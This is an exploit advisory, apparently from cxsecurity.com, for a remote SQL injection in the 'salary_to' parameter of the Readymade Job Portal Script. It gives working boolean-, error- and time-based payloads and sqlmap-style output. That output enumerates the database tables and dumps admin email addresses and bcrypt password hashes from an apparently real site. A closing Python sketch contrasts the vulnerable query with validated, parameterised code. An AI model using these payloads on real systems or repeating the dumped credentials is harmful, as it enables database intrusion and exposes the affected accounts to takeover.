Readymade Job Portal Script SQL Injection

2022.08.14
Credit: CraCkEr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

C r a C k E r
T H E   C R A C K   O F   E T E R N A L   M I G H T
From The Ashes and Dust Rises An Unimaginable crack....

[ Exploits ]

Author    : CraCkEr
Website   : i-netsolution.com
Vendor    : i-Net Solution
Software  : Readymade Job Portal Script
Vuln Type : Remote SQL Injection
Method    : GET
Impact    : Database Access

Job Portal is a website that serves as a bridge between employers and job seekers

B4nks-NET irc.b4nks.tk #unix

Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Greets: Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk, loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, chamanwal, ix7
CryptoJob (Twitter) twitter.com/CryptozJob

© CraCkEr 2022

GET parameter 'salary_to' is vulnerable.

---
Parameter: salary_to (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=&salary_from=222&salary_to=333) AND 3040=3040 AND (4873=4873

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: search=&salary_from=222&salary_to=333) AND (SELECT 3022 FROM(SELECT COUNT(*),CONCAT(0x71706a7671,(SELECT (ELT(3022=3022,1))),0x7162716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (1802=1802

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=&salary_from=222&salary_to=333) AND (SELECT 5992 FROM (SELECT(SLEEP(10)))wrGn) AND (8437=8437
---

[+] Starting the Attack

[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0 (MariaDB fork)

[INFO] fetching current database
current database: 'theminsall_jobportal_db'

[INFO] fetching tables for database: 'theminsall_jobportal_db'

Database: theminsall_jobportal_db
[72 tables]
+----------------------------------+
| admin_password_resets            |
| admins                           |
| applicant_messages               |
| blog_categories                  |
| blogs                            |
| career_levels                    |
| cities                           |
| cms                              |
| cms_content                      |
| companies                        |
| company_messages                 |
| company_password_resets          |
| contact_messages                 |
| countries                        |
| countries_details                |
| degree_levels                    |
| degree_types                     |
| failed_jobs                      |
| faqs                             |
| favourite_applicants             |
| favourites_company               |
| favourites_job                   |
| functional_areas                 |
| genders                          |
| industries                       |
| job_alerts                       |
| job_apply                        |
| job_apply_rejected               |
| job_experiences                  |
| job_shifts                       |
| job_skills                       |
| job_titles                       |
| job_types                        |
| jobs                             |
| language_levels                  |
| languages                        |
| major_subjects                   |
| manage_job_skills                |
| marital_statuses                 |
| migrations                       |
| ownership_types                  |
| packages                         |
| password_resets                  |
| payu_transactions                |
| profile_cvs                      |
| profile_education_major_subjects |
| profile_educations               |
| profile_experiences              |
| profile_languages                |
| profile_projects                 |
| profile_skills                   |
| profile_summaries                |
| queue_jobs                       |
| report_abuse_company_messages    |
| report_abuse_messages            |
| result_types                     |
| roles                            |
| salary_periods                   |
| send_to_friend_messages          |
| seo                              |
| site_settings                    |
| sliders                          |
| states                           |
| subscriptions                    |
| testimonials                     |
| unlocked_users                   |
| user_messages                    |
| users                            |
| videos                           |
| widget_pages                     |
| widgets                          |
| widgets_data                     |
+----------------------------------+

[INFO] fetching columns for table 'admins' in database 'theminsall_jobportal_db'

Database: theminsall_jobportal_db
Table: admins
[8 columns]
+----------------+------------------+
| Column         | Type             |
+----------------+------------------+
| created_at     | timestamp        |
| email          | varchar(191)     |
| id             | int(10) unsigned |
| name           | varchar(191)     |
| password       | varchar(191)     |
| remember_token | varchar(100)     |
| role_id        | int(11)          |
| updated_at     | timestamp        |
+----------------+------------------+

[INFO] fetching entries of column(s) 'email,id,name,password' for table 'admins' in database 'theminsall_jobportal_db'

Database: theminsall_jobportal_db
Table: admins
[3 entries]
+----+--------------------+--------------------------------------------------------------+-----------+
| id | email              | password                                                     | name      |
+----+--------------------+--------------------------------------------------------------+-----------+
| 3  | buyer@buyer.com    | $2y$10$47ig/2wfYDc6EVg0iVnvp.l.jC0APqEVUjR7P6PFYTEhbNFzHPJ66 | Buyer     |
| 4  | sub@jobsportal.com | $2y$10$uxtmaI.4Xrb3EEaLW6uvBuOKXyWCNtZ05pQFMwd6Jd1G0k9ZlKV/C | Sub Admin |
| 5  | admin@gmail.com    | $2y$10$AvprFLS9PQXUs.3QVwyYZejm4FVYlKM02.nykVF.dVxS9D82I8ZLG | Admin     |
+----+--------------------+--------------------------------------------------------------+-----------+

Possible Algorithms: bcrypt $2*$, Blowfish (Unix)

[-] Done
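
Added example (not part of the original advisory and not the vendor's code): every payload above closes a parenthesis right after 333, which suggests salary_to is concatenated into a parenthesised WHERE group. The Python/sqlite3 sketch below assumes that query shape and a hypothetical jobs table, and sets it beside an integer allow-list with bound parameters.

```python
import sqlite3

# Boolean-based payload value for salary_to, copied from the advisory.
PAGE_PAYLOAD = "333) AND 3040=3040 AND (4873=4873"

def make_db():
    """In-memory stand-in; the jobs table and its rows are constructed samples."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE jobs (id INTEGER PRIMARY KEY, title TEXT, salary INTEGER)")
    db.executemany("INSERT INTO jobs (title, salary) VALUES (?, ?)",
                   [("Clerk", 250), ("Analyst", 300), ("Director", 9000)])
    return db

def build_concat_sql(salary_from, salary_to):
    # Assumed vulnerable shape: request text pasted inside a parenthesised group.
    return ("SELECT title FROM jobs WHERE (salary >= " + salary_from +
            " AND salary <= " + salary_to + ") ORDER BY id")

def search_concat(db, salary_from, salary_to):
    return [row[0] for row in db.execute(build_concat_sql(salary_from, salary_to))]

def parse_salary(raw):
    # Allow-list: ASCII decimal digits only, bounded length; anything else is rejected.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("salary must be a non-negative integer")
    return int(raw)

def search_bound(db, salary_from, salary_to):
    # Hardened form: validate first, then bind values so they never become SQL syntax.
    low, high = parse_salary(salary_from), parse_salary(salary_to)
    sql = "SELECT title FROM jobs WHERE (salary >= ? AND salary <= ?) ORDER BY id"
    return [row[0] for row in db.execute(sql, (low, high))]

def is_rejected(db, salary_from, salary_to):
    try:
        search_bound(db, salary_from, salary_to)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print(build_concat_sql("222", PAGE_PAYLOAD))   # payload text is now part of the statement
    print(search_concat(db, "222", PAGE_PAYLOAD))  # executes without a syntax error
    print(search_bound(db, "222", "333"))          # normal request still works
    print(is_rejected(db, "222", PAGE_PAYLOAD))    # payload refused before reaching the DB
```

The same two controls apply to salary_from, which is used in the same request.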



Copyright 2022, cxsecurity.com

 
